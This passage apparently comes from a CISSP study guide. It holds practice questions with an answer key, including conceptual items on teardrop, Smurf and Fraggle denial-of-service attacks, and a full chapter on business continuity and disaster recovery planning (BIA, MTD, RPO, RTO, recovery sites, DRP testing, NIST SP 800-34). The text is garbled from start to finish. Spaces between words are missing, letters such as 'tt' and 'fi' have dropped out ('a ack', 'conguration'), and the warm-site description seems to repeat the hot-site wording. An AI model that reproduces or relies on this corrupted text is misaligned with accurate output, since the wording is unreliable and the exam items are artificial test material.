4.Whichtypeofa ackleveragesoverlappingfragmentstocauseaDenialof
Service?
A.Smurf
B.Teardrop
C.Fraggle
D.PingofDeath
5.Whichofthefollowingcanbeeitheradetectiveordeterrentcontrol?
A.Separationofduties
B.Principleofleastprivilege
C.Rotationofduties
D.Collusion

ANSWERS
1.Correctanswerandexplanation:C.AnswerCiscorrect;destructionisthe
mostsecurewaytodestroydata:itoersphysicalandvisualevidenceof
successfulcompletion.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Degaussingandbitleveloverwritesmaybeadequatewhen

performedsuccessfullyagainstmagneticmediabutoernovisualproofof
successfulcompletion.Thismeansundetectederrorsmayresultinrisk.
Forma ingisincorrectbecauseitusuallyreplacestheFileAllocationTable
(FAT)withanewversionbutusuallyleavesunallocateddataasis.
2.Correctanswerandexplanation:B.AnswerBiscorrect;RAID3stripes
dataacrossmultipledisksatthebytelevel.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.RAID2stripesatthebitlevel.BothRAID4andRAID5stripeatthe
blocklevel.
3.Correctanswerandexplanation:A.AnswerAiscorrect;conguration
managementinvolvesthecreationofknownsecuritybaselineforsystems
andisoftenbuiltleveragingthirdpartysecuritycongurationguides.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.Changemanagementisconcernedwithensuringaregimented
processisfollowedforanychangesmadetosystems.Patchmanagement
ensuresthatsystemsreceivetimelyupdatestoinstalledsoftware.
Vulnerabilitymanagementspurposeistocometounderstandwhatknown
vulnerabilitiesexistinanorganizationandtrackingtheirremediationover
time.
4.Correctanswerandexplanation:B.AnswerBiscorrect;theteardropa ack
isaDoSthatworksbysendingoverlappingfragmentsthat,whenreceivedby
avulnerablehost,cancauseasystemtocrash.
IncorrectAnswersandExplanations:A,C,andD.AnswersA,C,andDare
incorrect.Smurfa ackssendspoofedICMPEchoRequeststopublicly
accessibledirectedbroadcastaddresses.FraggleissimilartoSmurfbutuses
UDPinsteadofICMP.ThePingofDeathalsousesfragments,buttheydonot
overlap.
5.Correctanswerandexplanation:C.AnswerCiscorrect;rotationofduties
canserveasaeitherdetectiveordeterrentcontrol:thefearofbeingcaught
maydetersomeonefromcommi ingfraud;therotationmaydetectfraud
thathasalreadyoccurred.
IncorrectAnswersandExplanations:A,B,andD.AnswersA,B,andDare
incorrect.Separationofdutiesandtheprincipleofleastprivilegeare
primarilypreventivecontrols.Collusionisnotacontrol.

NISTSpecialPublication80061:ComputerSecurityIncidentHandling

Guide.h p://csrc.nist.gov/publications/nistpubs/80061rev2/SP80061rev2.pdf
[accessedMay5,2013].
1

ExecutiveOrder12356Nationalsecurityinformation.

h p://www.archives.gov/federalregister/codication/executive
order/12356.html[accessedMay5,2013].

CHAPTER8

Domain 8: Business Continuity an

d Disaster Recovery Planning
Abstract
ThischapterfocusesonDomain8:BusinessContinuityandDisaster
RecoveryPlanning.AthoroughunderstandingofbothBusinessContinuity
Planning(BCP)andDisasterRecoveryPlanning(DRP)isrequiredinorderto
besuccessfulwithquestionsfromthisdomain.Akeygoalistounderstand
thedierencesinthescopeandpurposeoftheBCPandDRP.DRPrepresents
amoretacticalinformationsystemsfocusedexercisewhiletheBCP,which
includesDRPasoneofitscomponents,isconsiderablymorevastandhigh
level.KeyconceptsforthisdomainincludethatofperformingaBusiness
ImpactAnalysis(BIA)anddeterminingasystemsMaximumTolerable
Downtime(MTD).

KEYWORDS
BusinessContinuityPlan(BCP);ContinuityofOperationsPlan(COOP);
Disaster;DisasterRecoveryPlan(DRP);MeanTimeBetweenFailures(MTBF);
MeanTimetoRepair(MTTR);RecoveryPointObjective(RPO);Recovery
TimeObjective(RTO);WorkRecoveryTime(WRT);MeanTimeBetween
Failures(MTBF);MeanTimetoRepair(MTTR);MinimumOperating
Requirements(MOR)

Exam Objectives in This Chapter

BCPandDRPOverviewandProcess
DevelopingaBCP/DRP

DRPTestingandTraining
ContinuedBCP/DRPMaintenance
SpecicBCP/DRPFrameworks

Introduction
BusinessContinuityandDisasterRecoveryPlanningisanorganizationslast
lineofdefense:whenallothercontrolshavefailed,BCP/DRPisthenal
controlthatmaypreventdrasticeventssuchasinjury,lossoflife,orfailureof
anorganization.Asinformationsecurityprofessionals,wemustbevigilant
andprotectourorganizationsandstafromthesedisruptiveevents.

BCP AND DRP OVERVIEW AND PROCESS

ThetermsandconceptsassociatedwithBusinessContinuityandDisaster
RecoveryPlanningareoftenmisunderstood.Clearunderstandingofwhatis
meantbybothBusinessContinuityandDisasterRecoveryPlanning,aswell
aswhattheyentail,iscriticalfortheCISSPcandidate.
Business Continuity Planning

ThoughmanyorganizationswillsimplyusethephrasesBusinessContinuity
Planning(BCP)orDisasterRecoveryPlanninginterchangeably,theyaretwo
distinctdisciplines.TheoverarchinggoalofaBCPisforensuringthatthe
businesswillcontinuetooperatebefore,throughout,andafteradisaster
eventisexperienced.ThefocusofaBCPisonthebusinessasawholeand
ensuringthatthosecriticalservicesthatthebusinessprovidesorcritical
functionsthatthebusinessregularlyperformscanstillbecarriedoutbothin
thewakeofadisruptionandafterthedisruptionhasbeenweathered.
Disaster Recovery Planning

TheDisasterRecoveryPlan(DRP)providesashorttermplanfordealingwith
specicITorienteddisruptions.Mitigatingamalwareinfectionthatshows
riskofspreadingtoothersystemsisanexampleofaspecicIToriented
disruptionthataDRPwouldaddress.TheDRPfocusesoneciently
a emptingtomitigatetheimpactofadisasterandtheimmediateresponse
andrecoveryofcriticalITsystemsinthefaceofasignicantdisruptiveevent.
DisasterRecoveryPlanningisconsideredtacticalratherthanstrategicand

providesameansforimmediateresponsetodisasters.
Relationship between BCP and DRP

TheBusinessContinuityPlanisanumbrellaplanthatincludesmultiple
specicplans,mostimportantlytheDisasterRecoveryPlan.TheDisaster
RecoveryPlanservesasasubsetoftheoverallBusinessContinuityPlan,
becauseaBCPwouldbedoomedtofailifitdidnotcontainatacticalmethod
forimmediatelydealingwithdisruptionofinformationsystems.Figure8.1,
fromNISTSpecialPublication80034,providesavisualmeansfor
understandingtheinterrelatednessofaBCPandaDRP,aswellasContinuity
ofOperationsPlan(COOP),OccupantEmergencyPlan(OEP),andothers.

11

FIGURE8.1 BCPandrelatedplans.

Disasters or disruptive events

GiventhatorganizationsBusinessContinuityandDisasterRecoveryPlans
arecreatedbecauseofthepotentialofdisastersimpactingoperations,
understandingdisastersanddisruptiveeventsisnecessary.

FastFacts
Thethreecommonwaysofcategorizingthecausesfordisastersare
whetherthethreatagentisnatural,human,orenvironmentalinnature.

NaturalThemostobvioustypeofthreatthatcanresultinadisasteris

naturallyoccurring.Thiscategoryincludesthreatssuchasearthquakes,
hurricanes,tornadoes,oods,andsometypesofres.Historically,natural
disastershaveprovidedsomeofthemostdevastatingdisastersthatan
organizationcanhavetorespondto.
HumanThehumancategoryofthreatsrepresentsthemostcommon
sourceofdisasters.Humanthreatscanbefurtherclassiedbywhether
theyconstituteanintentionalorunintentionalthreat.
EnvironmentalThreatsfocusedoninformationsystemsordatacenter
environmentsincludeitemssuchaspowerissues(blackout,brownout,
surge,spike),systemcomponentorotherequipmentfailures,and
applicationorsoftwareaws.
1

ibid.

Theanalysisofthreatsanddeterminationoftheassociatedlikelihoodofthe
threatsbeingmanifestedareanimportantpartoftheBCPandDRPprocess.
Table8.1providesaquicksummaryofsomeofthedisastereventsandwhat
typeofdisastertheyconstitute.

FastFacts
Typesofdisruptiveeventsinclude:
Errorsandomissions:typicallyconsideredthemostcommonsourceof
disruptiveevents.Thistypeofthreatiscausedbyhumanswho
unintentionallyserveasasourceofharm.
Naturaldisasters:includeearthquakes,hurricanes,oods,tsunamis,etc.
Electricalorpowerproblems:lossofpowermaycauseavailabilityissues
andintegrityissuesduetocorrupteddata.
Temperatureandhumidityfailures:maydamageequipmentdueto

overheating,corrosion,orstaticelectricity.
Warfare,terrorism,andsabotage:threatcanvarydramaticallybasedon
geographiclocation,industry,brandvalue,andtheinterrelatednesswith
otherhighvaluetargetorganizations.
Financiallymotivateda ackers:a ackerswhoseektomakemoneyby
a ackingvictimorganizationsandincludeexltrationofcardholderdata,
identitytheft,pumpanddumpstockschemes,bogusantimalwaretools,
orcorporateespionageandothers.
Personnelshortages:maybecausedbystrikes,pandemics,or
transportationissues.Alackofstamayleadtooperationaldisruption.

Table8.1
ExamplesofDisruptiveEvents

DisruptiveEvent

Type

Earthquake/tornado/hurricane/etc. Natural
Strike

Human(intentional)

Cyberterrorism

Human(intentional)/technical

Malware

Human(intentional)/technical

DenialofService

Human(intentional)/technical

Errorsandomissions

Human(unintentional)

Electricalfire

Environmental

Equipmentfailure

Environmental

The Disaster Recovery Process

HavingdiscussedtheimportanceofBusinessContinuityandDisaster

RecoveryPlanningandexamplesofthreatsthatjustifythisdegreeof
planning,wewillnowfocusonthefundamentalstepsinvolvedinrecovering
fromadisaster.
Respond

Inordertobeginthedisasterrecoveryprocess,theremustbeaninitial
responsethatbeginstheprocessofassessingthedamage.Speedisessential
duringthisinitialassessment.Theinitialassessmentwilldetermineifthe
eventinquestionconstitutesadisaster.
Activate team

Ifadisasterisdeclared,thentherecoveryteamneedstobeactivated.
Dependingonthescopeofthedisaster,thiscommunicationcouldprove
extremelydicult.Theuseofcallingtrees,whichwillbediscussedinSection
CallTreesinthischapter,canhelptofacilitatethisprocesstoensurethat
memberscanbeactivatedassmoothlyaspossible.
Communicate

Oneofthemostdicultaspectsofdisasterrecoveryisensuringthat
consistenttimelystatusupdatesarecommunicatedbacktothecentralteam
managingtheresponseandrecoveryprocess.Thiscommunicationoftenmust
occuroutofband,meaningthatthetypicalcommunicationmethodof
leveraginganocephonewillquiteoftennotbeaviableoption.Inaddition
tocommunicationofinternalstatusregardingtherecoveryactivities,the
organizationmustbepreparedtoprovideexternalcommunications,which
involvedisseminatingdetailsregardingtheorganizationsrecoverystatus
withthepublic.
Assess

Thoughaninitialassessmentwascarriedoutduringtheinitialresponse
portionofthedisasterrecoveryprocess,amoredetailedandthorough
assessmentwillbeperformedbythedisasterrecoveryteam.Theteamwill
proceedtoassessingtheextentofthedamagetodeterminethepropersteps
necessarytoensuretheorganizationsabilitytomeetitsmission.
Reconstitution

Theprimarygoalofthereconstitutionphaseistosuccessfullyrecovercritical
businessoperationsateitherprimaryorsecondarysite.Ifanalternatesiteis

leveraged,adequatesafetyandsecuritycontrolsmustbeinplaceinorderto
maintaintheexpecteddegreeofsecuritytheorganizationtypicallyemploys.
Theuseofanalternatecomputingfacilityforrecoveryshouldnotexposethe
organizationtofurthersecurityincidents.Inadditiontotherecoveryteams
eortsatreconstitutionofcriticalbusinessfunctionsatanalternatelocation,a
salvageteamwillbeemployedtobegintherecoveryprocessattheprimary
facilitythatexperiencedthedisaster.Ultimately,theexpectationis,unless
whollyunwarrantedgiventhecircumstances,thattheprimarysitewillbe
recoveredandthatthealternatefacilitysoperationswillfailbackorbe
transferredagaintotheprimarycenterofoperations.

DEVELOPING A BCP/DRP
DevelopingaBCP/DRPisvitalforanorganizationsabilitytorespondand
recoverfromaninterruptioninnormalbusinessfunctionsorcatastrophic
event.Inordertoensurethatallplanninghasbeenconsidered,theBCP/DRP
hasaspecicsetofrequirementstoreviewandimplement.Belowarelisted
thesehighlevelsteps,accordingtoNIST80034,toachievingasound,logical
BCP/DRP.NIST80034istheNationalInstituteofStandardsand
TechnologiesInformationTechnologyContingencyPlanningGuide.
ProjectInitiation
ScopetheProject
BusinessImpactAnalysis
IdentifyPreventiveControls
RecoveryStrategy
PlanDesignandDevelopment
Implementation,Training,andTesting
BCP/DRPMaintenance

Project Initiation

InordertodeveloptheBCP/DRP,thescopeoftheprojectmustbe
determinedandagreedupon.

FastFacts
ProjectInitiationinvolvessevendistinctmilestones

aslistedbelow:

1.Developthecontingencyplanningpolicystatement:Aformaldepartment
oragencypolicyprovidestheauthorityandguidancenecessaryto
developaneectivecontingencyplan.
2.Conductthebusinessimpactanalysis(BIA):TheBIAhelpstoidentifyand
prioritizecriticalITsystemsandcomponents.Atemplatefordeveloping
theBIAisalsoprovidedtoassisttheuser.
3.Identifypreventivecontrols:Measurestakentoreducetheeectsofsystem
disruptionscanincreasesystemavailabilityandreducecontingencylife
cyclecosts.
4.Developrecoverystrategies:Thoroughrecoverystrategiesensurethatthe
systemmayberecoveredquicklyandeectivelyfollowingadisruption.
5.DevelopanITcontingencyplan:Thecontingencyplanshouldcontain
detailedguidanceandproceduresforrestoringadamagedsystem.
6.Plantesting,training,andexercises:Testingtheplanidentiesplanning
gaps,whereastrainingpreparesrecoverypersonnelforplanactivation;
bothactivitiesimproveplaneectivenessandoverallagency
preparedness.
7.Planmaintenance:Theplanshouldbealivingdocumentthatisupdated
regularlytoremaincurrentwithsystemenhancements.
3

ibid.

ibid.

Assessing the critical state

Assessingthecriticalstatecanbedicultbecausedeterminingwhichpieces

oftheITinfrastructurearecriticaldependssolelyonhowitsupportsthe
userswithintheorganization.Forexample,withoutconsultingallofthe
users,asimplemappingprogrammaynotseemtobecriticalassetsforan
organization.However,ifthereisausergroupthatdrivestrucksandmakes
deliveriesforbusinesspurposes,thismappingsoftwaremaybecriticalfor
themtoschedulepickupsanddeliveries.
Conduct Business Impact Analysis

TheBusinessImpactAnalysis(BIA)istheformalmethodfordetermininghow
adisruptiontotheITsystem(s)ofanorganizationwillimpactthe
organizationsrequirements,processes,andinterdependencieswithrespectto
thebusinessmission.

ItisananalysistoidentifyandprioritizecriticalIT

systemsandcomponents.ItenablestheBCP/DRPprojectmanagertofully
characterizetheITcontingencyrequirementsandpriorities.

Theobjective

istocorrelatetheITsystemcomponentswiththecriticalserviceitsupports.It
alsoaimstoquantifytheconsequenceofadisruptiontothesystem
componentandhowthatwillaecttheorganization.Theprimarygoalofthe
BIAistodeterminetheMaximumTolerableDowntime(MTD)foraspecicIT
asset.Thiswilldirectlyimpactwhatdisasterrecoverysolutionischosen.
Identify critical assets

ThecriticalassetlistisalistofthoseITassetsthataredeemedbusiness
essentialbytheorganization.ThesesystemsDRP/BCPmusthavethebest
availablerecoverycapabilitiesassignedtothem.
Conduct BCP/DRP-focused risk assessment

TheBCP/DRPfocusedriskassessmentdetermineswhatrisksareinherentto
whichITassets.AvulnerabilityanalysisisalsoconductedforeachITsystem
andmajorapplication.ThisisdonebecausemosttraditionalBCP/DRP
evaluationsfocusonphysicalsecuritythreats,bothnaturalandhuman.
Determine Maximum Tolerable Downtime

TheprimarygoaloftheBIAistodeterminetheMaximumTolerableDowntime
(MTD),whichdescribesthetotaltimeasystemcanbeinoperablebeforean
organizationisseverelyimpacted.Itisthemaximumtimeittakestoexecute
thereconstitutionphase.Reconstitutionistheprocessofmovingan
organizationfromthedisasterrecoverytobusinessoperations.

MaximumTolerableDowntimeiscomposedoftwometrics:theRecoveryTime
Objective(RTO)andtheWorkRecoveryTime(WRT);seebelow.
Alternate terms for MTD

Dependingonthebusinesscontinuityframeworkthatisused,otherterms
maybesubstitutedforMaximumTolerableDowntime.Theseinclude
MaximumAllowableDowntime(MAD),MaximumTolerableOutage(MTO),
andMaximumAcceptableOutage(MAO).
Failure and recovery metrics

Anumberofmetricsareusedtoquantifyhowfrequentlysystemsfail,how
longasystemmayexistinafailedstate,andthemaximumtimetorecover
fromfailure.ThesemetricsincludetheRecoveryPointObjective(RPO),
RecoveryTimeObjective(RTO),WorkRecoveryTime(WRT),MeanTime
BetweenFailures(MTBF),MeanTimetoRepair(MTTR),andMinimum
OperatingRequirements(MOR).
Recovery Point Objective

TheRecoveryPointObjective(RPO)istheamountofdatalossorsystem
inaccessibility(measuredintime)thatanorganizationcanwithstand.Ifyou
performweeklybackups,someonemadeadecisionthatyourcompanycould
toleratethelossofaweeksworthofdata.Ifbackupsareperformedon
SaturdayeveningsandasystemfailsonSaturdayafternoon,youhavelost
theentireweeksworthofdata.ThisistheRecoveryPointObjective.Inthis
case,theRPOis1week.

TheRPOrepresentsthemaximumacceptableamountofdata/worklossfora
givenprocessbecauseofadisasterordisruptiveevent.
Recovery Time Objective and Work Recovery Time

TheRecoveryTimeObjective(RTO)describesthemaximumtimeallowedto
recoverbusinessorITsystems.RTOisalsocalledthesystemsrecoverytime.
ThisisonepartofMaximumTolerableDowntime:oncethesystemis
physicallyrunning,itmustbecongured.

CrunchTime

WorkRecoveryTime(WRT)describesthetimerequiredtocongurea
recoveredsystem.Downtimeconsistsoftwoelements,thesystems
recoverytimeandtheworkrecoverytime.Therefore,
MTD=RTO+WRT.
8

ibid.

Mean Time Between Failures

MeanTimeBetweenFailures(MTBF)quantieshowlonganeworrepaired
systemwillrunbeforefailing.Itistypicallygeneratedbyacomponent
vendorandislargelyapplicabletohardwareasopposedtoapplicationsand
software.
Mean Time to Repair

TheMeanTimetoRepair(MTTR)describeshowlongitwilltaketorecovera
specicfailedsystem.ItisthebestestimateforreconstitutingtheITsystemso
thatbusinesscontinuitymayoccur.
Minimum Operating Requirements

MinimumOperatingRequirements(MOR)describetheminimum
environmentalandconnectivityrequirementsinordertooperatecomputer
equipment.ItisimportanttodetermineanddocumentwhattheMORisfor
eachITcriticalassetbecause,intheeventofadisruptiveeventordisaster,
properanalysiscanbeconductedquicklytodetermineiftheITassetswillbe
abletofunctionintheemergencyenvironment.
Identify Preventive Controls

Preventivecontrolspreventdisruptiveeventsfromhavinganimpact.For
example,asstatedinChapter10,Domain10:Physical(Environmental)
Security,HVACsystemsaredesignedtopreventcomputerequipmentfrom
overheatingandfailing.

D i d Yo u K n o w ?
TheBIAwillidentifysomerisksthatmaybemitigatedimmediately.This

isanotheradvantageofperformingBCP/DRP,includingtheBIA:it
improvesyoursecurity,evenifnodisasteroccurs.

Recovery strategy

OncetheBIAiscomplete,theBCPteamknowstheMaximumTolerable
Downtime.Thismetric,aswellasothersincludingtheRecoveryPoint
ObjectiveandRecoveryTimeObjective,isusedtodeterminetherecovery
strategy.AcoldsitecannotbeusediftheMTDis12hours,forexample.Asa
generalrule,theshortertheMTD,themoreexpensivetherecoverysolution
willbe.
Redundant site

Aredundantsiteisanexactproductionduplicateofasystemthathasthe
capabilitytoseamlesslyoperateallnecessaryIToperationswithoutlossof
servicestotheenduserofthesystem.Aredundantsitereceivesdatabackups
inrealtimesothatintheeventofadisaster,theusersofthesystemhaveno
lossofdata.Itisabuildingconguredexactlyliketheprimarysiteandisthe
mostexpensiverecoveryoptionbecauseiteectivelymorethandoublesthe
costofIToperations.Tobefullyredundant,asitemusthaverealtimedata
backupstotheproductionsystemandtheendusershouldnotnoticeany
dierenceinITservicesoroperationsintheeventofadisruptiveevent.
Hot site

Ahotsiteisalocationthatanorganizationmayrelocatetofollowingamajor
disruptionordisaster.Itisadatacenterwitharaisedoor,power,utilities,
computerperipherals,andfullyconguredcomputers.Thehotsitewillhave
allnecessaryhardwareandcriticalapplicationsdatamirroredinrealtime.A
hotsitewillhavethecapabilitytoallowtheorganizationtoresumecritical
operationswithinaveryshortperiodoftimesometimesinlessthanan
hour.
Itisimportanttonotethedierencebetweenahotandredundantsite.Hot
sitescanquicklyrecovercriticalITfunctionality;itmayevenbemeasuredin
minutesinsteadofhours.However,aredundantsitewillappearasoperating
normallytotheendusernoma erwhatthestateofoperationsisfortheIT
program.Ahotsitehasallthesamephysical,technical,andadministrative

controlsimplementedoftheproductionsite.
Warm site

Awarmsitehassomeaspectsofahotsite,forexample,readilyaccessible
hardwareandconnectivity,butitwillhavetorelyuponbackupdatainorder
toreconstituteasystemafteradisruption.Itisadatacenterwitharaised
oor,power,utilities,computerperipherals,andfullyconguredcomputers.
Cold site

Acoldsiteistheleastexpensiverecoverysolutiontoimplement.Itdoesnot
includebackupcopiesofdatanordoesitcontainanyimmediatelyavailable
hardware.Afteradisruptiveevent,acoldsitewilltakethelongestamountof
timeofallrecoverysolutionstoimplementandrestorecriticalITservicesfor
theorganization.Especiallyinadisasterarea,itcouldtakeweekstoget
vendorhardwareshipmentsinplacesoorganizationsusingacoldsite
recoverysolutionwillhavetobeabletowithstandasignicantlylongMTD.
Acoldsiteistypicallyadatacenterwitharaisedoor,power,utilities,and
physicalsecurity,butnotmuchbeyondthat.
Reciprocal agreement

Reciprocalagreementsareabidirectionalagreementbetweentwoorganizations
inwhichoneorganizationpromisesanotherorganizationthatitcanmovein
andsharespaceifitexperiencesadisaster.Itisdocumentedintheformofa
contractwri entogainsupportfromoutsideorganizationsintheeventofa
disaster.TheyarealsoreferredtoasMutualAidAgreements(MAAs)and
theyarestructuredsothateachorganizationwillassisttheotherintheevent
ofanemergency.
Mobile site

Mobilesitesaredatacentersonwheels:towabletrailersthatcontainracksof
computerequipment,aswellasHVAC,resuppression,andphysical
security.Theyareagoodtfordisasterssuchasadatacenterood,where
thedatacenterisdamagedbuttherestofthefacilityandsurrounding
propertyareintact.Theymaybetowedonsite,suppliedpowerandnetwork,
andbroughtonline.
Related plans

Asdiscussedpreviously,theBusinessContinuityPlanisanumbrellaplan

thatcontainsotherplans.InadditiontotheDisasterRecoveryPlan,other
plansincludetheContinuityofOperationsPlan(COOP),theBusiness
Resumption/RecoveryPlan(BRP),ContinuityofSupportPlan,CyberIncident
ResponsePlan,OccupantEmergencyPlan(OEP),andtheCrisisManagement
Plan(CMP).Table8.2,fromNISTSpecialPublication80034,summarizes
theseplans.
Table8.2
SummaryofBCPPlansfromNISTSP80034

NISTSP80034.

Call Trees

Call Trees

AkeytoolleveragedforstacommunicationbytheCrisisCommunications
PlanistheCallTree,whichisusedtoquicklycommunicatenewsthroughout
anorganizationwithoutoverburdeninganyspecicperson.TheCallTree
worksbyassigningeachemployeeasmallnumberofotheremployeesthey
areresponsibleforcallinginanemergencyevent.Forexample,the
organizationpresidentmaynotifyexecutiveleadershipofanemergency
situationandthey,inturn,willnotifytheirtoptiermanagers.Thetoptier
managerswillthencallthepeopletheyhavebeenassignedtocall.TheCall
Treecontinuesuntilallaectedpersonnelhavebeencontacted.

DRP TESTING AND TRAINING

Testing,training,andawarenessmustbeperformedforthedisasterportion
ofaBCP/DRP.SkippingthesestepsisoneofthemostcommonBCP/DRP
mistakes.SomeorganizationscompletetheirDRPandthenconsiderthe
ma erresolvedandputthebigDRPbinderonashelftocollectdust.This
propositioniswrongonnumerouslevels.
First,aDRPisnevercomplete,butisratheracontinuallyamendedmethod
forensuringtheabilityfortheorganizationtorecoverinanacceptable
manner.Second,whilewellmeaningindividualscarryoutthecreationand
updateofaDRP,eventhemostdiligentofadministratorswillmake
mistakes.Tondandcorrecttheseissuespriortotheirhinderingrecoveryin
anactualdisastertestingmustbecarriedoutonaregularbasis.Third,any
DRPthatwillbeeectivewillhavesomeinherentcomplexoperationsand
maneuverstobeperformedbyadministrators.Therewillalwaysbe
unexpectedoccurrencesduringdisasters,buteachmemberoftheDRP
shouldbeexceedinglyfamiliarwiththeparticularsoftheirroleinaDRP,
whichisacallfortrainingontheprocess.
Finally,awarenessofthegeneralusersroleintheDRP,aswellasawareness
oftheorganizationsemphasisonensuringthesafetyofpersonneland
businessoperationsintheeventofadisaster,isimperative.Thissectionwill
providedetailsonstepstoeectivelytest,train,andbuildawarenessforthe
organizationsDRP.
DRP testing

InordertoensurethataDisasterRecoveryPlanrepresentsaviableplanfor

recovery,thoroughtestingisneeded.GiventheDRPsdetailedtacticalsubject
ma er,itshouldcomeasnosurprisethatroutineinfrastructure,hardware,
software,andcongurationchangeswillalterthewaytheDRPneedstobe
carriedout.Organizationsinformationsystemsareinaconstantstateofux,
butunfortunately,muchofthesechangesdonotreadilymaketheirwayinto
anupdatedDRP.ToensureboththeinitialandcontinuedecacyoftheDRP
asafeasiblerecoverymethodology,testingneedstobeperformed.
DRP review

TheDRPreviewisthemostbasicformofinitialDRPtestingandisfocused
onsimplyreadingtheDRPinitsentiretytoensurecompletenessofcoverage.
Thisreviewistypicallytobeperformedbytheteamthatdevelopedtheplan
andwillinvolveteammembersreadingtheplaninitsentiretytoquickly
reviewtheoverallplanforanyobviousaws.TheDRPreviewisprimarily
justasanitychecktoensurethattherearenoglaringomissionsincoverageor
fundamentalshortcomingsintheapproach.
Checklist

Checklist(alsoknownasconsistency)testinglistsallnecessarycomponents
requiredforsuccessfulrecoveryandensuresthattheyare,orwillbe,readily
availableshouldadisasteroccur.Forexample,ifthedisasterrecoveryplan
callsforthereconstitutionofsystemsfromtapebackupsatanalternate
computingfacility,doesthesiteinquestionhaveanadequatenumberoftape
drivesonhandtocarryouttherecoveryintheindicatedwindowoftime?
Thechecklisttestisoftenperformedconcurrentlywiththestructuredwalk
throughortabletoptestingasasolidrsttestingthreshold.Thechecklisttest
isfocusedonensuringthattheorganizationhas,orcanacquireinatimely
fashion,sucientlevelresourcesonwhichtheirsuccessfulrecoveryis
dependent.
Structured walk-through/tabletop

Anothertestthatiscommonlycompletedatthesametimeasthechecklist
testisthatofthestructuredwalkthrough,whichisalsooftenreferredtoasa
tabletopexercise.DuringthistypeofDRPtest,usuallyperformedpriortomore
indepthtesting,thegoalistoallowindividualswhoareknowledgeable
aboutthesystemsandservicestargetedforrecoverytothoroughlyreviewthe
overallapproach.Thetermstructuredwalkthroughisillustrative,asthe
groupwilltalkthroughtheproposedrecoveryproceduresinastructured

mannertodeterminewhetherthereareanynoticeableomissions,gaps,
erroneousassumptions,orsimplytechnicalmisstepsthatwouldhinderthe
recoveryprocessfromsuccessfullyoccurring.
Simulation test/walk-through drill

Asimulationtest,alsocalledawalkthroughdrill(nottobeconfusedwiththe
discussionbasedstructuredwalkthrough),goesbeyondtalkingaboutthe
processandactuallyhasteamstocarryouttherecoveryprocess.Apretend
disasterissimulatedtowhichtheteammustrespondastheyaredirectedto
bytheDRP.Thescopeofsimulationswillvarysignicantlyandtendtogrow
tobemorecomplicatedandinvolvemoresystems,assmallerdisaster
simulationsaresuccessfullymanaged.Thoughsomewillseethegoalas
beingabletosuccessfullyrecoverthesystemsimpactedbythesimulation,
ultimately,thegoalofanytestingofaDRPistohelpensurethatthe
organizationiswellpreparedintheeventofanactualdisaster.
Parallel processing

AnothertypeofDRPtestisthatofparallelprocessing.Thistypeoftestis
commoninenvironmentswheretransactionaldataisakeycomponentofthe
criticalbusinessprocessing.Typically,thistestwillinvolverecoveryof
criticalprocessingcomponentsatanalternatecomputingfacilityandthen
restoredatafromapreviousbackup.Notethatregularproductionsystems
arenotinterrupted.
Partial and complete business interruption

Arguably,themosthighdelityofallDRPtestsinvolvesbusinessinterruption
testing.However,thistypeoftestcanactuallybethecauseofadisaster,so
extremecautionshouldbeexercisedbeforea emptinganactualinterruption
test.Asthenameimplies,thebusinessinterruptionstyleoftestingwillhave
theorganizationactuallystopprocessingnormalbusinessattheprimary
locationbutwillinsteadleveragethealternatecomputingfacility.Thesetypes
oftestsaremorecommoninorganizationswherefullyredundant,oftenload
balanced,operationsalreadyexist.
Training

AlthoughthereisanelementofDRPtrainingthatcomesaspartof
performingthetestsdiscussedabove,thereiscertainlyaneedformore
detailedtrainingonsomespecicelementsoftheDRPprocess.Another

aspectoftrainingistoensureadequaterepresentationonstaofthose
trainedinbasicrstaidandCPR.
Starting emergency power

Thoughitmightseemsimple,convertingadatacentertoemergencypower,
suchasbackupgeneratorsthatwillbegintakingtheloadastheUPSfail,is
nottobetakenlightly.Specictrainingandtestingofchangingoverto
emergencypowershouldberegularlyperformed.
Calling tree training/test

Anotherexampleofcombinationtrainingandtestingisinregardtocalling
trees,whichwasdiscussedpreviouslyinSectionCallTrees.The
hierarchicalrelationshipsofcallingtreescanmakeoutagesinthetree
problematic.Individualswithcallingresponsibilitiesaretypicallyexpectedto
beabletoanswerwithinaveryshorttimeperiodorotherwisemake
arrangements.

CONTINUED BCP/DRP MAINTENANCE

OncetheinitialBCP/DRPiscompleted,tested,trained,andimplemented,it
mustbekeptuptodate.BusinessandITsystemschangequickly,andIT
professionalsareaccustomedtoadaptingtothatchange.BCP/DRPsmust
keeppacewithallcriticalbusinessandITchanges.
Change management

Changemanagementincludestrackinganddocumentingallplanned
changes,formalapprovalforsubstantialchanges,anddocumentationofthe
resultsofthecompletedchange.Allchangesmustbeauditable.

CrunchTime
TheBCPteamshouldbeamemberofthechangecontrolboardand
a endallmeetings.ThegoaloftheBCPteamsinvolvementonthe
changecontrolboardistoidentifyanychangesthatmustbeaddressedby
theBCP/DRP.

BCP/DRP mistakes

BCP/DRP mistakes

Businesscontinuityanddisasterrecoveryplanningisabusinesslastlineof
defenseagainstfailure.Ifothercontrolshavefailed,BCP/DRPisthenal
control.Ifitfails,thebusinessmayfail.
ThesuccessofBCP/DRPiscritical,butmanyplansfail.TheBCPteamshould
considerthefailureofotherorganizationsplanandviewtheirownunder
intensescrutiny.Theyshouldaskthemselvesthisquestion:Havewemade
mistakesthatthreatenthesuccessofourplan?

FastFacts
CommonBCP/DRPmistakesinclude:
Lackofmanagementsupport
Lackofbusinessunitinvolvement
Lackofprioritizationamongcriticalsta
Improper(oftenoverlynarrow)scope
Inadequatetelecommunicationsmanagement
Inadequatesupplychainmanagement
Incompleteorinadequatecrisismanagementplan
Lackoftesting
Lackoftrainingandawareness
FailuretokeeptheBCP/DRPuptodate

SPECIFIC BCP/DRP FRAMEWORKS

Giventhepatchworkofoverlappingtermsandprocessesusedbyvarious
BCP/DRPframeworks,thischapterfocusesonuniversalbestpractices,

withouta emptingtomaptoanumberofdierent(andsometimes
inconsistent)termsandprocessesdescribedbyvariousBCP/DRP
frameworks.
NIST SP 800-34

TheNationalInstituteofStandardsandTechnology(NIST)Special
Publication80034Rev.1ContingencyPlanningGuideforFederal
InformationSystemsmaybedownloadedat
h p://csrc.nist.gov/publications/nistpubs/80034rev1/sp80034rev1_errata
Nov112010.pdf.Thedocumentishighqualityandpublicdomain.Planscan
sometimesbesignicantlyimprovedbyreferencingSP80034whenwriting
orupdatingaBCP/DRP.
ISO/IEC 27031

